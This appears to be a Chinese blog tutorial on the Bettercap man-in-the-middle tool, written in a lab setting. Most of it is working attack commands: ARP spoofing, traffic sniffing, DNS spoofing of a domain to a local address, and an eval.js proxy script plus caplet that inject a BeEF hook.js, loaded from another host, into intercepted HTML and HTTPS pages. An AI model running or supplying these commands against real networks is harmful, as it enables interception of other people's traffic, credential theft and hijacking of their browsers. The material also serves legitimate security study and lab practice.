美文网首页
Bettercap 简单使用

Bettercap 简单使用

作者: flashine | 来源:发表于2020-03-16 16:07 被阅读0次

安装

sudo apt install bettercap

启动

# 查看网卡
ifconfig
# 启动
sudo bettercap -iface eth0

模块

键入help命令即可查看可使用的模块

modules.png
# 开启流量嗅探
net.sniff on
# 开启arp欺骗
arp.spoof on
# 开始网络主机发现
net.recon on
# 显示主机列表缓存(默认按ip排序)
net.show
# 探测网络上的新主机
net.probe on

DNS欺骗

set dns.spoof.domains www.example.com
set dns.spoof.address 10.10.10.128
dns.spoof on
dns_spoof.png

arp欺骗+js注入

eval.js源码:

function onLoad(){
    log("Bettercap loaded.");
}
function onResponse(req, res){
    if(res.ContentType.indexOf('text/html')==0){ // 修改html文件的源码
        var body = res.ReadBody();
        log("inject js!");
        if(body.indexOf('</head>') != -1){
            res.Body = body.replace('
            </head>',
            // 以下内容为植入网页的js
            '<script type="text/script" src="http://10.10.10.128:3000/hook.js"></script></head>');
        }
    }
}

可将命令保存为cap文件:

set http.proxy.script /root/Desktop/eval.js
set https.proxy.script /root/Desktop/eval.js
http.proxy on
https.proxy on
arp.spoof on

命令行运行bettercap -iface eth0 -caplets /root/Desktop/xx.cap

植入js操作在https页面时可能导致浏览器警告网页证书不可信,也可能导致浏览器访问超时
网页植入beef 的hook.js后在控制端未看到该主机,不知什么原因

wireshark 查看导出的流量

set net.sniff.output /root/Desktop/test.pcap
net.sniff on
arp.spoof on
wireshark.png

相关文章

  • Bettercap 简单使用

    安装 启动 模块 键入help命令即可查看可使用的模块 DNS欺骗 arp欺骗+js注入 eval.js源码: 可...

  • 瑞士军刀 Bettercap2.4 使用教程

    Bettercap 是一款瑞士军刀(github地址),这款开源软件可用于网络攻击和监控: Bettercap支持...

  • 2019-08-07

    bettercap是一个强大的,模块化的,方便并且容易扩展的中间人攻击框架。 主要选项: -T:指定中间人目标(I...

  • 简单使用

    创建模型 过滤器 我们有一些字段和我们想让用户筛选的基础上 名称、价格或release_date。 我们创建一个 ...

  • gorange

    数组中简单使用 map中简单使用

  • 简单使用使用kaggle

    向我这样的条件不好的可以考虑借助云gpu来加速训练,借助kaggle可以在kaggle服务器上训练数据,kaggl...

  • 零碎的小程序笔记

    目录 template的简单使用WXS的简单使用npm的简单使用倒计时js的实现wx:for的使用一些js方法记录...

  • 命令行的简单使用

    Git命令行的简单使用,仅供自己使用 pod命令行的简单使用

  • 单元测试和OCMock

    OCMock使用一、安装及简单使用:使用Cocoapod引入:pod 'OCMock' 简单使用:新建一个单元测试...

  • Alamofire类似AFNetworking的简单使用和封装

    简单的使用。简单的使用。简单的使用。注定该文弱鸡一个,求拍砖。 一、介绍 Alamofire(Swift)的前身是...

网友评论

      本文标题:Bettercap 简单使用

      本文链接:https://www.haomeiwen.com/subject/fxfnehtx.html